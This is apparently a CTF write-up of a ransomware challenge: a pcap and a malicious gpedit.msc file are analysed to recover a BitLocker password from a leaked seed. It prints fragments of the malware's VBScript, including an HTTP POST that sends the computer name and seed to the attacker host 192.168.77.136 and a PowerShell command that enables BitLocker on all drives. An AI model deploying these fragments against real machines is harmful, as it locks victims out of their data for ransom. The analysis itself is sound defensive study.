Solved by Danzi, fjellape & Octagone
Author: LOLASL
My computer went to ransomland and all I got was this lousy pcap! Can you please help me unlock the
FlagDisk.vhdx?
Looking at the PCAP, we see two interesting HTTP packets. The IP address 192.168.77.167 was seen downloading a file named gpedit.zip and later uploading data to /updatelog on the IP address 192.168.77.136
Looking at /updatedlog we can see the text.
POST /updatelog HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: fr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Content-Length: 40
Host: 192.168.77.136
upgrade=REVTS1RPUC01OUMxQzNECTQzOTA2LjgzQuick base64 decode later we get:
upgrade=DESKTOP-59C1C3D 43906.83Ok, that looks like a computername and a random number, not sure what that does yet, maybe the gpedit.zip file can help us find out what that is.
We use the File -> Export Objects -> HTTP in Wireshark to extract gpedit.zip from the PCAP and from the zip file we get a file called gpedit.msc.
Opening it up in VSCode, we see that it's just one massive XML file. Scrolling through, we spot a part where it's using xls.loadXML to load an XML-formatted string. The string looks like its url encoded, so we run it through URL decode in CyberChef, and voilà! We get the entire readable code.
Examining the script, we observe that it generates a seed from various system properties, including used and free memory, total and free space, performance metrics, and network data. This seed is then utilized to generate a 64-character string using a random selection from a predefined set of characters.
Dim strRandom
characters = "THEQUICKBROWNFOXJUMPSOVERTHELAZYDOG!@#$&*-+=_;0123456789thequickbrownfoxjumpsoverthlazydog"
Dim seed
seed = CStr(usedMemory) & CStr(usedSpaceTotal) & CStr(freeSpaceTotal) & CStr(freeMemory) & CStr(sys) & CStr(perf) & CStr(received) & CStr(sent) & CStr(Timer)
Rnd(-1)
Randomize seed
For i = 1 To 64
randomNum = Int(Len(characters) * Rnd(2))
randomChar = Mid(characters, randomNum + 1, 1)
strRandom = strRandom & randomChar
NextHere we can see the "computerName" Tab "seed" is send to 192.168.77.136 in a file called /updatelog, lucky us, we got the /updatelog data from the computer that got "ransomwared" from the pcap.
Set httpRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
httpRequest.Open "POST", "http://192.168.77.136/updatelog", False
httpRequest.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
httpRequest.SetRequestHeader "accept-language", "fr"
httpRequest.SetRequestHeader "user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0"
httpRequest.Option(4) = 13056
httpRequest.Option(6) = true
computerName = CreateObject("WScript.Network").ComputerName
postDataPlaintext = computerName & vbTab & seed
postDataPlaintext2 = computerName & vbTab & resultUpon further inspection, we see that the script uses strRandom as the BitLocker password, formatted as "'strRandom'" (Chr(34) = " ,Chr(39) = '). The script uses a PowerShell command to convert strRandom into a secure string using ConvertTo-SecureString and then applies it as a password to enable BitLocker on the drives.
If Len((CreateObject("WScript.Shell").Exec("powershell.exe -Command $a=ConvertTo-SecureString " & Chr(34) & Chr(39) & strRandom & Chr(39) & Chr(34) & " -asplaintext -force;Enable-BitLocker " & drives(i) & " -s -qe -pwp -pw $a")).stdout.readall) > 0 Then: End IfAfter analyzing the script and understanding how it works, we are pretty sure that the value 43906.83 found in the /updatelog within the PCAP file is likely the seed used to set the BitLocker password on the disk. By knowing this exact seed, we can modify the strRandom function from the original script and replace the seed with 43906.83, that should yield the same password used by the ransomware.
Dim strRandom
characters = "THEQUICKBROWNFOXJUMPSOVERTHELAZYDOG!@#$&*-+=_;0123456789thequickbrownfoxjumpsoverthlazydog"
Dim seed
seed = 43906.83 ' Replace the seed with the one in the PCAP.
Rnd(-1)
Randomize seed
For i = 1 To 64
randomNum = Int(Len(characters) * Rnd(2))
randomChar = Mid(characters, randomNum + 1, 1)
strRandom = strRandom & randomChar
Next
WScript.Echo strRandom ' prints out strRandom in a msgboxvoila, we get out the password:
_tfeTIO$*Vy##f@GyRfDEJvRvNerHHDrE=GHr0CRFgSX3VYD4koa-LUU&OTDe;rb
Now we only need to mount the disk and enter the password
and there is the flag
EPT{it_works_the_machine_works!}